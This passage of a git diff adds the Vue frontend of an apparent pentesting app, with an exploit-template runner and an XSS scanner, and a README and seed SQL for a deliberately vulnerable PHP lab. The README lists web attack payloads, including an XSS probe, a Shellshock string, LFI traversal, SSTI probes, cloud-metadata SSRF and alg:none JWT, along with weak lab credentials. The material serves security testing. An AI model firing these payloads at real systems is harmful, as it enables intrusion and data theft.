+    const sev = (f.severity || "info").toLowerCase();
+    const matchers = f.matcher_names?.length ? ` {${f.matcher_names.join(",")}}` : "";
+    const extras: string[] = [];
+    if (f.cve_id) extras.push(f.cve_id);
+    if (f.cvss) extras.push(`cvss:${f.cvss}`);
+    const extra = extras.length ? ` [${extras.join(" ")}]` : "";
+    const msg = `[${sev.toUpperCase()}] ${f.template_id} :: ${f.target} → ${f.matched_url} (${f.status})${matchers}${extra}`;
+    if (sev === "critical" || sev === "high") log.hit(msg);
+    else if (sev === "medium") log.warn(msg);
+    else log.ok(msg);
+  }));
+
+  try {
+    const res: any[] = await invoke("xploit_run", {
+      req: {
+        targets: tgts,
+        templates_yaml: yamls,
+        concurrency: 15,
+        timeout_ms: 10000,
+      },
+    });
+    log.ok(`xploit complete: ${res.length} finding(s)`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+
+onMounted(bootstrap);
+onUnmounted(cleanup);
+
+// ---------- editor helpers ----------
+const helperPlaceholders = ["{{BaseURL}}", "{{Hostname}}", "{{randstr}}", "{{rand_int}}", "{{unix_time}}"];
+const dslExamples = [
+  "status == 200",
+  "duration > 5000",
+  'contains(body, "text")',
+  'regex(body, "^pat$")',
+];
+
+function onContentChange(e: Event) {
+  editorContent.value = (e.target as HTMLTextAreaElement).value;
+  editorDirty.value = true;
+}
+</script>
+
+<template>
+  <div class="module">
+    <!-- ============ LIST VIEW ============ -->
+    <template v-if="view === 'list'">
+      <div class="form">
+        <label class="ta">
+          <span class="lbl">targets</span>
+          <textarea class="term-input" v-model="targets" placeholder="https://target.com&#10;https://another.com" rows="2" spellcheck="false" />
+        </label>
+
+        <div class="row">
+          <label class="mini wide"><span>search</span><input v-model="query" placeholder="rce, lfi, ssti, cve..." @keyup.enter="reload" /></label>
+          <label class="mini wide"><span>tag</span><input v-model="tagFilter" placeholder="rce, exposure..." @keyup.enter="reload" /></label>
+          <button class="btn-ghost" @click="reload">reload</button>
+        </div>
+
+        <div class="row">
+          <label class="toggle"><input type="checkbox" v-model="severities.critical" /><span>critical</span></label>
+          <label class="toggle"><input type="checkbox" v-model="severities.high" /><span>high</span></label>
+          <label class="toggle"><input type="checkbox" v-model="severities.medium" /><span>medium</span></label>
+          <label class="toggle"><input type="checkbox" v-model="severities.low" /><span>low</span></label>
+          <label class="toggle"><input type="checkbox" v-model="severities.info" /><span>info</span></label>
+        </div>
+      </div>
+
+      <div class="tpl-panel">
+        <div class="tpl-head">
+          <span class="tpl-title">arsenal // {{ templates.length }} templates // {{ selected.size }} armed</span>
+          <button class="btn-ghost" @click="openEditor(null)">+ new</button>
+          <button class="btn-ghost" @click="toggleAll">{{ selected.size === templates.length ? "unarm all" : "arm all" }}</button>
+          <button class="exec small" :disabled="running || !selected.size" @click="run">
+            {{ running ? "[ firing... ]" : `> fire (${selected.size})` }}
+          </button>
+        </div>
+        <div class="tpl-list">
+          <div v-if="!templates.length" class="tpl-empty">no templates match filters. click [+ new] to create one.</div>
+          <div
+            v-for="t in templates"
+            :key="t.path"
+            class="tpl-row"
+            :class="{ picked: selected.has(t.path) }"
+          >
+            <input type="checkbox" :checked="selected.has(t.path)" @change="toggle(t.path)" @click.stop />
+            <span class="sev" :class="`sev-${t.severity}`" @click="toggle(t.path)">{{ t.severity }}</span>
+            <span class="tpl-id" @click="toggle(t.path)">{{ t.id }}</span>
+            <span class="tpl-meta" @click="toggle(t.path)">
+              <span class="tpl-tags">{{ t.tags.slice(0, 3).join(",") }}</span>
+              <span v-if="t.builtin" class="tpl-badge">bundled</span>
+            </span>
+            <div class="tpl-actions">
+              <button class="ico" @click.stop="openEditor(t)" title="edit">✎</button>
+              <button class="ico" @click.stop="duplicate(t)" title="duplicate">⎘</button>
+              <button class="ico danger" @click.stop="remove(t)" title="delete">✕</button>
+            </div>
+          </div>
+        </div>
+      </div>
+
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.done / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.done }} / {{ progress.total }}</span>
+      </div>
+
+      <Terminal :lines="log.lines.value" title="xploiter // output" @clear="log.clear()" />
+    </template>
+
+    <!-- ============ EDITOR VIEW ============ -->
+    <template v-else>
+      <div class="editor-head">
+        <button class="btn-ghost" @click="view = 'list'">◀ back</button>
+        <input v-model="editorFilename" class="edit-filename" placeholder="filename.yaml" spellcheck="false" />
+        <span v-if="editorDirty" class="dirty">● modified</span>
+        <button class="exec small" @click="save">save</button>
+      </div>
+      <textarea
+        class="editor-body term-input"
+        :value="editorContent"
+        @input="onContentChange"
+        spellcheck="false"
+        placeholder="# paste YAML template here"
+      />
+      <div class="editor-help">
+        <div><strong>helpers:</strong>
+          <code v-for="h in helperPlaceholders" :key="h">{{ h }}</code>
+        </div>
+        <div><strong>matchers:</strong> word, regex, status, size, binary(hex), dsl</div>
+        <div><strong>dsl:</strong>
+          <template v-for="(d, i) in dslExamples" :key="d">
+            <code>{{ d }}</code><span v-if="i < dslExamples.length - 1">, </span>
+          </template>
+        </div>
+        <div><strong>attack:</strong> batteringram | pitchfork | clusterbomb</div>
+      </div>
+    </template>
+  </div>
+</template>
+
+<style scoped>
+.tpl-panel {
+  display: flex;
+  flex-direction: column;
+  border: 1px solid var(--border);
+  background: var(--bg-panel);
+  min-height: 180px;
+  max-height: 340px;
+  overflow: hidden;
+}
+.tpl-head {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  padding: 4px 8px;
+  border-bottom: 1px solid var(--border);
+  background: var(--bg-elev);
+  flex-wrap: wrap;
+}
+.tpl-title {
+  flex: 1;
+  font-size: 10px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  min-width: 0;
+}
+.exec.small { padding: 3px 10px; font-size: 11px; flex: 0 0 auto; min-width: 0; }
+
+.tpl-list { flex: 1; overflow-y: auto; }
+.tpl-empty { padding: 16px; color: var(--fg-ghost); text-align: center; font-size: 11px; }
+
+.tpl-row {
+  display: grid;
+  grid-template-columns: 18px 80px 1fr 1.2fr auto;
+  gap: 6px;
+  align-items: center;
+  padding: 4px 8px;
+  border-bottom: 1px solid var(--border);
+  cursor: pointer;
+  font-size: 11px;
+  transition: background 0.1s;
+}
+.tpl-row:hover { background: rgba(255, 255, 255, 0.02); }
+.tpl-row.picked { background: rgba(255, 47, 74, 0.06); }
+.tpl-row input[type="checkbox"] { accent-color: var(--alert); }
+.tpl-id { color: var(--fg); overflow: hidden; text-overflow: ellipsis; white-space: nowrap; }
+.tpl-meta { display: flex; gap: 6px; align-items: center; overflow: hidden; min-width: 0; }
+.tpl-tags { color: var(--info); font-size: 10px; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; min-width: 0; }
+.tpl-badge {
+  font-size: 9px;
+  color: var(--fg-dim);
+  border: 1px solid var(--border-hot);
+  padding: 0 4px;
+  letter-spacing: 0.1em;
+  text-transform: uppercase;
+  flex-shrink: 0;
+}
+.tpl-actions { display: flex; gap: 2px; flex-shrink: 0; }
+.ico {
+  width: 24px; height: 24px;
+  display: inline-flex;
+  align-items: center;
+  justify-content: center;
+  color: var(--fg-dim);
+  border: 1px solid transparent;
+  font-size: 13px;
+}
+.ico:hover { color: var(--fg); border-color: var(--border-hot); background: var(--bg); }
+.ico.danger:hover { color: var(--alert); border-color: var(--alert); }
+
+/* editor */
+.editor-head {
+  display: flex;
+  gap: 6px;
+  align-items: center;
+  flex-wrap: wrap;
+}
+.edit-filename {
+  flex: 1;
+  min-width: 120px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  padding: 4px 8px;
+  font-size: 12px;
+  font-family: inherit;
+}
+.edit-filename:focus { border-color: var(--info); outline: none; }
+.dirty { color: var(--warn); font-size: 10px; text-transform: uppercase; letter-spacing: 0.1em; }
+.editor-body {
+  flex: 1;
+  min-height: 260px;
+  font-size: 12px;
+  line-height: 1.5;
+  tab-size: 2;
+}
+.editor-help {
+  font-size: 10px;
+  color: var(--fg-dim);
+  padding: 6px 8px;
+  border: 1px solid var(--border);
+  background: var(--bg-panel);
+  line-height: 1.6;
+}
+.editor-help > div { margin-bottom: 3px; }
+.editor-help > div:last-child { margin-bottom: 0; }
+.editor-help code {
+  color: var(--info);
+  background: var(--bg);
+  padding: 0 4px;
+  margin: 0 2px;
+  border: 1px solid var(--border);
+  display: inline-block;
+}
+.editor-help strong {
+  color: var(--alert);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  font-size: 9px;
+  margin-right: 4px;
+}
+
+@media (max-width: 640px) {
+  .tpl-row { grid-template-columns: 18px 60px 1fr auto; }
+  .tpl-meta { display: none; }
+}
+</style>
diff --git a/src/components/modules/Xss.vue b/src/components/modules/Xss.vue
new file mode 100644
index 0000000..105278d
--- /dev/null
+++ b/src/components/modules/Xss.vue
@@ -0,0 +1,76 @@
+<script setup lang="ts">
+import { onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+const url = ref("https://example.com/search?q=test");
+const paramsFilter = ref("");
+const useGet = ref(true);
+const usePost = ref(false);
+const concurrency = ref(5);
+const timeoutMs = ref(10000);
+const running = ref(false);
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  log.clear();
+
+  const methods: string[] = [];
+  if (useGet.value) methods.push("GET");
+  if (usePost.value) methods.push("POST");
+  if (!methods.length) { log.err("pick a method"); running.value = false; return; }
+
+  const paramsList = paramsFilter.value.split(/[\s,]+/).map(s => s.trim()).filter(Boolean);
+  log.info(`target: ${url.value}`);
+
+  unlistens.push(await listen<string>("xss:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<any>("xss:hit", (e) => {
+    const p = e.payload;
+    const msg = `[${p.confidence}] ${p.method} ${p.param} :: ctx=${p.context} :: ${p.evidence} :: payload="${p.payload}"`;
+    if (p.confidence === "HIGH") log.hit(msg);
+    else log.warn(msg);
+  }));
+
+  try {
+    const res: any[] = await invoke("xss_scan", {
+      req: {
+        url: url.value,
+        params: paramsList.length ? paramsList : null,
+        methods,
+        concurrency: concurrency.value,
+        timeout_ms: timeoutMs.value,
+      },
+    });
+    log.ok(`scan done: ${res.length} reflection(s)`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally { running.value = false; cleanup(); }
+}
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <Prompt label="url" v-model="url" placeholder="https://target.com/search?q=test" />
+      <Prompt label="params" v-model="paramsFilter" placeholder="q,name (blank = auto)" />
+      <div class="row">
+        <label class="toggle"><input type="checkbox" v-model="useGet" /><span>GET</span></label>
+        <label class="toggle"><input type="checkbox" v-model="usePost" /><span>POST</span></label>
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="50" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="1000" max="30000" /></label>
+      </div>
+      <div class="row">
+        <button class="exec" :disabled="running" @click="run">{{ running ? "[ probing... ]" : "> fire" }}</button>
+      </div>
+    </div>
+    <Terminal :lines="log.lines.value" title="xss // canary + context-aware payload" @clear="log.clear()" />
+  </div>
+</template>
diff --git a/src/composables/useTerminal.ts b/src/composables/useTerminal.ts
new file mode 100644
index 0000000..a724e15
--- /dev/null
+++ b/src/composables/useTerminal.ts
@@ -0,0 +1,41 @@
+import { ref } from "vue";
+
+export type LogLevel = "info" | "hit" | "ok" | "valid" | "warn" | "err" | "dim";
+
+export interface LogLine {
+  ts: string;
+  level: LogLevel;
+  text: string;
+}
+
+export function useTerminal(max = 500) {
+  const lines = ref<LogLine[]>([]);
+
+  function now() {
+    const d = new Date();
+    return d.toTimeString().slice(0, 8);
+  }
+
+  function push(level: LogLevel, text: string) {
+    lines.value.push({ ts: now(), level, text });
+    if (lines.value.length > max) {
+      lines.value.splice(0, lines.value.length - max);
+    }
+  }
+
+  function clear() {
+    lines.value = [];
+  }
+
+  return {
+    lines,
+    clear,
+    info: (t: string) => push("info", t),
+    hit: (t: string) => push("hit", t),
+    ok: (t: string) => push("ok", t),
+    valid: (t: string) => push("valid", t),
+    warn: (t: string) => push("warn", t),
+    err: (t: string) => push("err", t),
+    dim: (t: string) => push("dim", t),
+  };
+}
diff --git a/src/main.ts b/src/main.ts
new file mode 100644
index 0000000..de275e7
--- /dev/null
+++ b/src/main.ts
@@ -0,0 +1,5 @@
+import { createApp } from "vue";
+import App from "./App.vue";
+import "./style.css";
+
+createApp(App).mount("#app");
diff --git a/src/style.css b/src/style.css
new file mode 100644
index 0000000..6aa6f24
--- /dev/null
+++ b/src/style.css
@@ -0,0 +1,261 @@
+:root {
+  --bg: #050505;
+  --bg-elev: #0b0b0b;
+  --bg-panel: #090909;
+  --border: #1c1c1c;
+  --border-hot: #2a2a2a;
+  --fg: #d4d4d4;
+  --fg-dim: #6a6a6a;
+  --fg-ghost: #3a3a3a;
+  --accent: #e8e8e8;
+  --accent-dim: #8a8a8a;
+  --alert: #ff2f4a;
+  --warn: #d4a537;
+  --info: #7fb3d5;
+  --valid: #5cd982;
+  --mono: 'JetBrains Mono', 'Space Mono', ui-monospace, 'SFMono-Regular', Menlo, Consolas, monospace;
+}
+
+* {
+  box-sizing: border-box;
+  margin: 0;
+  padding: 0;
+}
+
+html, body, #app {
+  height: 100%;
+  background: var(--bg);
+  color: var(--fg);
+  font-family: var(--mono);
+  font-size: 13px;
+  line-height: 1.5;
+  -webkit-font-smoothing: antialiased;
+  text-rendering: geometricPrecision;
+  overflow: hidden;
+}
+
+body {
+  background:
+    radial-gradient(ellipse at top, rgba(255, 47, 74, 0.035), transparent 55%),
+    radial-gradient(ellipse 80% 50% at bottom, rgba(255, 255, 255, 0.015), transparent 60%),
+    var(--bg);
+}
+
+/* subtle scanlines */
+body::before {
+  content: '';
+  position: fixed;
+  inset: 0;
+  background: repeating-linear-gradient(
+    0deg,
+    rgba(255, 255, 255, 0.015) 0px,
+    rgba(255, 255, 255, 0.015) 1px,
+    transparent 1px,
+    transparent 3px
+  );
+  pointer-events: none;
+  z-index: 1000;
+  mix-blend-mode: overlay;
+}
+
+/* flicker on vignette edges */
+body::after {
+  content: '';
+  position: fixed;
+  inset: 0;
+  box-shadow: inset 0 0 120px rgba(0, 0, 0, 0.9);
+  pointer-events: none;
+  z-index: 999;
+}
+
+::selection {
+  background: var(--accent);
+  color: var(--bg);
+}
+
+::-webkit-scrollbar {
+  width: 6px;
+  height: 6px;
+}
+::-webkit-scrollbar-track {
+  background: transparent;
+}
+::-webkit-scrollbar-thumb {
+  background: var(--border-hot);
+  border-radius: 0;
+}
+::-webkit-scrollbar-thumb:hover {
+  background: var(--accent-dim);
+}
+
+input, button, textarea, select {
+  font-family: inherit;
+  font-size: inherit;
+  color: inherit;
+  background: transparent;
+  border: none;
+  outline: none;
+}
+
+button {
+  cursor: pointer;
+}
+
+a {
+  color: var(--accent);
+  text-decoration: none;
+}
+
+/* ============ shared module form controls ============ */
+.module {
+  display: flex;
+  flex-direction: column;
+  gap: 10px;
+  height: 100%;
+  min-height: 0;
+  min-width: 0;
+  width: 100%;
+}
+.form { display: flex; flex-direction: column; gap: 6px; min-width: 0; flex-shrink: 0; }
+.row {
+  display: flex;
+  gap: 6px;
+  align-items: stretch;
+  flex-wrap: wrap;
+  min-width: 0;
+}
+.row > * { min-width: 0; }
+
+.ta { display: flex; flex-direction: column; }
+.lbl {
+  color: var(--fg-dim);
+  font-size: 10px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  padding: 2px 0;
+}
+textarea.term-input {
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  color: var(--fg);
+  padding: 6px 8px;
+  resize: vertical;
+  font-family: inherit;
+  font-size: 12px;
+}
+textarea.term-input:focus { border-color: var(--accent); outline: none; }
+
+.mini {
+  display: flex;
+  align-items: center;
+  gap: 5px;
+  border: 1px solid var(--border);
+  padding: 4px 8px;
+  background: var(--bg-panel);
+  flex: 0 0 auto;
+  min-width: 0;
+}
+.mini.wide { flex: 1 1 140px; min-width: 120px; }
+.mini > span {
+  color: var(--fg-dim);
+  font-size: 10px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  white-space: nowrap;
+  flex-shrink: 0;
+}
+.mini input {
+  width: 70px;
+  color: var(--fg);
+  text-align: right;
+  min-width: 0;
+}
+.mini.wide input { flex: 1; width: auto; text-align: left; min-width: 0; }
+
+.toggle {
+  display: flex;
+  align-items: center;
+  gap: 6px;
+  border: 1px solid var(--border);
+  padding: 4px 10px;
+  background: var(--bg-panel);
+  color: var(--fg-dim);
+  font-size: 11px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  cursor: pointer;
+  white-space: nowrap;
+  flex-shrink: 0;
+}
+.toggle input { accent-color: var(--alert); }
+.toggle:has(input:checked) { color: var(--alert); border-color: var(--alert); }
+
+.exec {
+  flex: 1 1 140px;
+  min-width: 120px;
+  border: 1px solid var(--accent);
+  color: var(--accent);
+  background: transparent;
+  padding: 6px 12px;
+  font-weight: 500;
+  letter-spacing: 0.05em;
+  text-transform: lowercase;
+  transition: all 0.15s;
+  white-space: nowrap;
+}
+.exec:hover:not(:disabled) {
+  background: var(--alert);
+  color: #fff;
+  border-color: var(--alert);
+  box-shadow: 0 0 16px rgba(255, 47, 74, 0.35);
+}
+.exec:disabled { color: var(--fg-dim); border-color: var(--border-hot); cursor: wait; }
+
+.btn-ghost {
+  border: 1px solid var(--border);
+  color: var(--fg-dim);
+  padding: 4px 10px;
+  font-size: 11px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+}
+.btn-ghost:hover { color: var(--fg); border-color: var(--border-hot); }
+
+.bar {
+  position: relative;
+  height: 14px;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  overflow: hidden;
+}
+.bar-fill {
+  height: 100%;
+  background: linear-gradient(90deg, var(--accent-dim), var(--accent));
+  transition: width 0.1s linear;
+}
+.bar-text {
+  position: absolute;
+  inset: 0;
+  display: flex;
+  align-items: center;
+  justify-content: center;
+  font-size: 10px;
+  color: var(--fg);
+  mix-blend-mode: difference;
+  letter-spacing: 0.1em;
+}
+
+/* severity chips */
+.sev {
+  display: inline-block;
+  padding: 1px 6px;
+  font-size: 10px;
+  letter-spacing: 0.1em;
+  text-transform: uppercase;
+  border: 1px solid;
+}
+.sev-critical { color: #ff2f4a; border-color: #ff2f4a; background: rgba(255,47,74,0.08); }
+.sev-high { color: #ff7043; border-color: #ff7043; }
+.sev-medium { color: #d4a537; border-color: #d4a537; }
+.sev-low { color: #7fb3d5; border-color: #7fb3d5; }
+.sev-info { color: var(--fg-dim); border-color: var(--border-hot); }
diff --git a/src/vite-env.d.ts b/src/vite-env.d.ts
new file mode 100644
index 0000000..fc81239
--- /dev/null
+++ b/src/vite-env.d.ts
@@ -0,0 +1,7 @@
+/// <reference types="vite/client" />
+
+declare module "*.vue" {
+  import type { DefineComponent } from "vue";
+  const component: DefineComponent<{}, {}, any>;
+  export default component;
+}
diff --git a/tegalsec.png b/tegalsec.png
new file mode 100644
index 0000000..ff8a1c3
Binary files /dev/null and b/tegalsec.png differ
diff --git a/tsconfig.json b/tsconfig.json
new file mode 100644
index 0000000..f82888f
--- /dev/null
+++ b/tsconfig.json
@@ -0,0 +1,25 @@
+{
+  "compilerOptions": {
+    "target": "ES2020",
+    "useDefineForClassFields": true,
+    "module": "ESNext",
+    "lib": ["ES2020", "DOM", "DOM.Iterable"],
+    "skipLibCheck": true,
+
+    /* Bundler mode */
+    "moduleResolution": "bundler",
+    "allowImportingTsExtensions": true,
+    "resolveJsonModule": true,
+    "isolatedModules": true,
+    "noEmit": true,
+    "jsx": "preserve",
+
+    /* Linting */
+    "strict": true,
+    "noUnusedLocals": true,
+    "noUnusedParameters": true,
+    "noFallthroughCasesInSwitch": true
+  },
+  "include": ["src/**/*.ts", "src/**/*.d.ts", "src/**/*.tsx", "src/**/*.vue"],
+  "references": [{ "path": "./tsconfig.node.json" }]
+}
diff --git a/tsconfig.node.json b/tsconfig.node.json
new file mode 100644
index 0000000..42872c5
--- /dev/null
+++ b/tsconfig.node.json
@@ -0,0 +1,10 @@
+{
+  "compilerOptions": {
+    "composite": true,
+    "skipLibCheck": true,
+    "module": "ESNext",
+    "moduleResolution": "bundler",
+    "allowSyntheticDefaultImports": true
+  },
+  "include": ["vite.config.ts"]
+}
diff --git a/vite.config.ts b/vite.config.ts
new file mode 100644
index 0000000..812e61c
--- /dev/null
+++ b/vite.config.ts
@@ -0,0 +1,32 @@
+import { defineConfig } from "vite";
+import vue from "@vitejs/plugin-vue";
+
+// @ts-expect-error process is a nodejs global
+const host = process.env.TAURI_DEV_HOST;
+
+// https://vite.dev/config/
+export default defineConfig(async () => ({
+  plugins: [vue()],
+
+  // Vite options tailored for Tauri development and only applied in `tauri dev` or `tauri build`
+  //
+  // 1. prevent Vite from obscuring rust errors
+  clearScreen: false,
+  // 2. tauri expects a fixed port, fail if that port is not available
+  server: {
+    port: 1420,
+    strictPort: true,
+    host: host || false,
+    hmr: host
+      ? {
+          protocol: "ws",
+          host,
+          port: 1421,
+        }
+      : undefined,
+    watch: {
+      // 3. tell Vite to ignore watching `src-tauri`
+      ignored: ["**/src-tauri/**"],
+    },
+  },
+}));
diff --git a/vuln-lab/README.md b/vuln-lab/README.md
new file mode 100644
index 0000000..bbdc50f
--- /dev/null
+++ b/vuln-lab/README.md
@@ -0,0 +1,174 @@
+# insecure.newploit.com — PocketPentester Vuln Lab
+
+Deliberately vulnerable PHP target for shaking down every arsenal module in
+PocketPentester. Runs as a local docker-compose stack.
+
+> [!WARNING]
+> Do NOT expose this to the public internet. It has intentional RCE, SQLi,
+> LFI, SSRF, open redirect, CORS misconfig, weak JWT, leaked secrets and
+> more. Keep it on a private bridge network only.
+
+---
+
+## Quick start
+
+```bash
+cd vuln-lab
+docker compose up --build -d
+```
+
+Add the hostname to your hosts file so the `insecure.newploit.com` SNI /
+Host header works:
+
+**Linux / macOS** → `/etc/hosts`
+```
+127.0.0.1   insecure.newploit.com
+```
+
+**Windows** → `C:\Windows\System32\drivers\etc\hosts`
+```
+127.0.0.1   insecure.newploit.com
+```
+
+**Android (testing from PocketPentester on device)** — set your phone's
+Wi-Fi DNS to the dev machine, or just use the host's LAN IP directly:
+```
+http://192.168.x.x/              (or whatever your dev box IP is)
+```
+
+Smoke-test from the host:
+```bash
+curl http://insecure.newploit.com/
+curl http://insecure.newploit.com/.env
+curl "http://insecure.newploit.com/search.php?q=<svg/onload=alert(1)>"
+```
+
+---
+
+## Open ports
+
+| Port   | Service           | Notes                                      |
+|--------|-------------------|--------------------------------------------|
+| 80     | Apache 2.4 + PHP  | main web app                               |
+| 443    | Apache TLS        | snakeoil cert for ssl_scan                 |
+| 3306   | MariaDB 10.11     | root:toor, also dbuser:dbpass123           |
+| 21     | vsftpd            | anonymous:anonymous                        |
+
+---
+
+## Module → endpoint map
+
+Everything below is already wired. Point the tool at `insecure.newploit.com`
+(or `http://<host>`) and it should fire.
+
+### RECON
+
+| Arsenal module   | Where it hits                                                    |
+|------------------|------------------------------------------------------------------|
+| `port_scan`      | 21 / 80 / 443 / 3306 open                                        |
+| `httpx`          | Title `Newploit :: insecure test lab`, Server `Apache/2.4.57 …`  |
+| `banner`         | Apache + MySQL banners expose full version                       |
+| `ssl_scan`       | Self-signed CN=insecure.newploit.com on :443                     |
+| `dns_tools`      | (local hosts entry)                                              |
+
+### EXPLOIT
+
+| Arsenal module   | Endpoint(s) that fire                                            |
+|------------------|------------------------------------------------------------------|
+| `sqli`           | `/search.php?q=…`, `/profile.php?id=…`, `/login.php` POST        |
+| `xss`            | `/search.php?q=<payload>` (reflected, unescaped)                 |
+| `jwt`            | `/api/auth.php` — `alg:none` accepted, HS256 secret = `secret`   |
+| `xploiter`       | see template-by-template table below                             |
+| `autopwn`        | runs the whole chain on `http://insecure.newploit.com/`          |
+
+### MANUAL
+
+| `repeater`       | any of the URLs above — try `?q=` with crafted payloads          |
+| `dirfuzz`        | common wordlist hits `/admin`, `/wp-admin`, `/backup.sql`, …     |
+| `admin_finder`   | `/admin/`, `/administrator/`, `/wp-admin/`, `/wp-login.php`      |
+| `form_brute`     | POST `/login.php` — `admin`:`admin123`, `root`:`toor`, …         |
+
+### UTILITY
+
+| `domain_grabber` | not relevant to a single host                                    |
+| `subdomain`      | not relevant to a single host (add wildcard DNS if desired)      |
+| `takeover`       | not relevant                                                     |
+| `lan_map`        | scan your local net and this container IP will show up           |
+
+---
+
+## Xploiter bundled templates
+
+| Template YAML              | Vuln endpoint                              | Trigger                      |
+|----------------------------|--------------------------------------------|------------------------------|
+| `xpl-env-leak`             | `/.env`, `.env.local`, `.env.production`   | `APP_KEY=`, `DB_PASSWORD=`   |
+| `xpl-git-config`           | `/.git/config`                             | `[core]` + remote URL        |
+| `xpl-phpinfo`              | `/phpinfo.php`                             | `<title>phpinfo()`           |
+| `xpl-lfi-basic`            | `/page.php?page=…`                         | `../../../../etc/passwd`     |
+| `xpl-rce-shellshock`       | `/cgi-bin/test.cgi` etc                    | `() { :; }; echo marker`     |
+| `xpl-ssti-jinja2`          | `/?name=xplZZZ{{999*777}}ssti`             | math eval inside `{{ }}`     |
+| `xpl-ssti-twig`            | `POST /` body=`name=…{{'x'\|upper}}…`      | filter pipe eval             |
+| `xpl-open-redirect`        | `/redirect.php?url=`, `/go.php?to=`, …     | `Location: evil.example`     |
+| `xpl-ssrf-basic`           | `/fetch.php?url=…169.254.169.254/…`        | canned AWS metadata reply    |
+| `xpl-wp-debug`             | `/wp-content/debug.log`                    | PHP error lines              |
+| `xpl-cors-misconfig`       | `/` and `/api/*`                           | Origin reflection + creds    |
+| `xpl-backup-files`         | `/backup.sql`, `/backup.zip`, `/db.sql`, … | >512B, non-HTML ctype        |
+| `xpl-rce-log4shell`        | (not applicable — no JVM)                  | won't fire                   |
+
+---
+
+## Creds cheatsheet (for form_brute / sqli bypass testing)
+
+```
+admin     / admin123
+root      / toor
+user      / password
+test      / test
+imtaqin   / newploit2024
+guest     / guest
+```
+
+Also in the DB: `api_tokens.token` column has `sk_*` values matching the
+ones in `/.env` so the leak-correlation story is consistent.
+
+---
+
+## Layout
+
+```
+vuln-lab/
+├── docker-compose.yml
+├── db/init.sql
+└── web/
+    ├── Dockerfile
+    ├── apache.conf
+    ├── cgi-bin/         # shellshock targets
+    └── www/
+        ├── index.php    # landing + SSTI + CORS
+        ├── search.php   # XSS + SQLi
+        ├── profile.php  # integer SQLi
+        ├── login.php    # SQLi login + form_brute target
+        ├── page.php     # LFI
+        ├── fetch.php    # SSRF (reflects AWS metadata)
+        ├── redirect.php # open redirect
+        ├── api/         # JWT + CORS endpoints
+        ├── admin/       # admin panel
+        ├── wp-login.php # wordpress decoy
+        ├── wp-content/debug.log
+        ├── .env, .env.local, .env.production
+        ├── .git/config, .git/HEAD
+        ├── .bash_history, .DS_Store
+        ├── backup.sql, backup.zip, backup.tar.gz
+        ├── db.sql, dump.sql, site.zip, www.zip, public_html.zip
+        └── robots.txt
+```
+
+---
+
+## Teardown
+
+```bash
+docker compose down -v
+```
+
+Built for PocketPentester by imtaqin / tegalsec. Have fun. Don't ship this.
diff --git a/vuln-lab/db/init.sql b/vuln-lab/db/init.sql
new file mode 100644
index 0000000..4d472bc
--- /dev/null
+++ b/vuln-lab/db/init.sql
@@ -0,0 +1,44 @@
+CREATE DATABASE IF NOT EXISTS newploit;
+USE newploit;
+
+CREATE TABLE users (
+    id INT PRIMARY KEY AUTO_INCREMENT,
+    username VARCHAR(64) NOT NULL,
+    password VARCHAR(128) NOT NULL,
+    email VARCHAR(128) NOT NULL,
+    role VARCHAR(32) NOT NULL DEFAULT 'user',
+    api_key VARCHAR(128) DEFAULT NULL
+) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
+
+INSERT INTO users (username, password, email, role, api_key) VALUES
+ ('admin','admin123','admin@insecure.newploit.com','admin','sk_admin_AKIAIOSFODNN7EXAMPLE'),
+ ('root','toor','root@insecure.newploit.com','admin','sk_root_deadbeefcafebabe'),
+ ('user','password','user@insecure.newploit.com','user','sk_user_abc123'),
+ ('test','test','test@insecure.newploit.com','user','sk_test_xyz789'),
+ ('imtaqin','newploit2024','taqin@insecure.newploit.com','admin','sk_tq_pocketpentester'),
+ ('guest','guest','guest@insecure.newploit.com','guest',NULL);
+
+CREATE TABLE products (
+    id INT PRIMARY KEY AUTO_INCREMENT,
+    name VARCHAR(128) NOT NULL,
+    category VARCHAR(64) DEFAULT NULL,
+    price DECIMAL(10,2) DEFAULT NULL,
+    description TEXT
+) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
+
+INSERT INTO products (name, category, price, description) VALUES
+ ('Pentest Laptop','hardware',2599.00,'Rugged laptop for offensive research'),
+ ('YubiKey','hardware',49.00,'Hardware FIDO2 authenticator'),
+ ('Burp Pro','software',499.00,'Web app testing'),
+ ('Newploit Pro','subscription',29.99,'Monthly subscription for cloud scanners'),
+ ('Ghidra Cloud','subscription',99.00,'RE-as-a-service for mobile pentesting');
+
+CREATE TABLE sessions (
+    id VARCHAR(64) PRIMARY KEY,
+    user_id INT NOT NULL,
+    token TEXT,
+    expires_at DATETIME
+) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
+
